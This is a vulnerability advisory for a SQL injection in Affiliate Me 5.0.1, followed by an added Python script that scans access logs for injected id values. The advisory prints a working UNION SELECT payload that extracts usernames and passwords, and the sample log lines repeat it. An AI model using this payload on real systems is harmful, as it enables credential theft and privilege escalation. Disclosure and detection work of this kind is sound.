Affiliate Me 5.0.1 SQL Injection

Affiliate Me version 5.0.1 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql #vulnerability #php #auth
[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/
[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: [email protected]
[#] Blog: https://www.0wl.tech
[#] 3xploit:
[path]/admin.php?show=reply&id=[Injected Query]
[#] 3xample:
[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -
[#] Notes:
- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.
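
Added example, not part of the original advisory or the vendor's code: a log check for requests to the admin.php?show=reply endpoint named above whose id value is not a plain integer. It assumes legitimate id values are decimal integers and that the web server writes combined-format access logs; the function name, the /aff/ path and the sample hosts are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; hosts, the /aff/ prefix and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [16/May/2023:10:01:02 +0000] "GET /aff/admin.php?show=reply&id=42 HTTP/1.1" 200 5120
203.0.113.9 - - [16/May/2023:10:03:17 +0000] "GET /aff/admin.php?show=reply&id=-999%27%20Union%20Select%201,2,3--%20- HTTP/1.1" 200 6033
203.0.113.9 - - [16/May/2023:10:03:40 +0000] "GET /aff/admin.php?show=reply&id=7+AND+1%3D1 HTTP/1.1" 200 5120
203.0.113.7 - - [16/May/2023:10:04:00 +0000] "GET /aff/admin.php?show=stats&id=abc HTTP/1.1" 200 900
198.51.100.2 - - [16/May/2023:10:05:00 +0000] "GET /aff/index.php?id=1 HTTP/1.1" 200 300
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# Quote, comment markers or UNION ... SELECT in the decoded value.
SQL_HINT_RE = re.compile(r"(?i)\bunion\b.*\bselect\b|--|/\*|'")


def suspicious_reply_requests(log_text):
    """Return (client_ip, decoded_id, reason) for each admin.php?show=reply
    request whose id is not a decimal integer (assumed to be the only valid form)."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/admin.php"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space.
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("show") != ["reply"]:
            continue
        for value in params.get("id", []):
            if re.fullmatch(r"\d+", value):
                continue
            reason = "sql-metacharacters" if SQL_HINT_RE.search(value) else "non-numeric-id"
            findings.append((m.group("ip"), value, reason))
    return findings


if __name__ == "__main__":
    for ip, value, reason in suspicious_reply_requests(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value!r}")
```

Only query-string parameters appear in access logs, so this covers the GET form shown in the advisory. The same integer-only rule can be enforced server-side by validating id before it reaches the query and binding it as a parameter.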
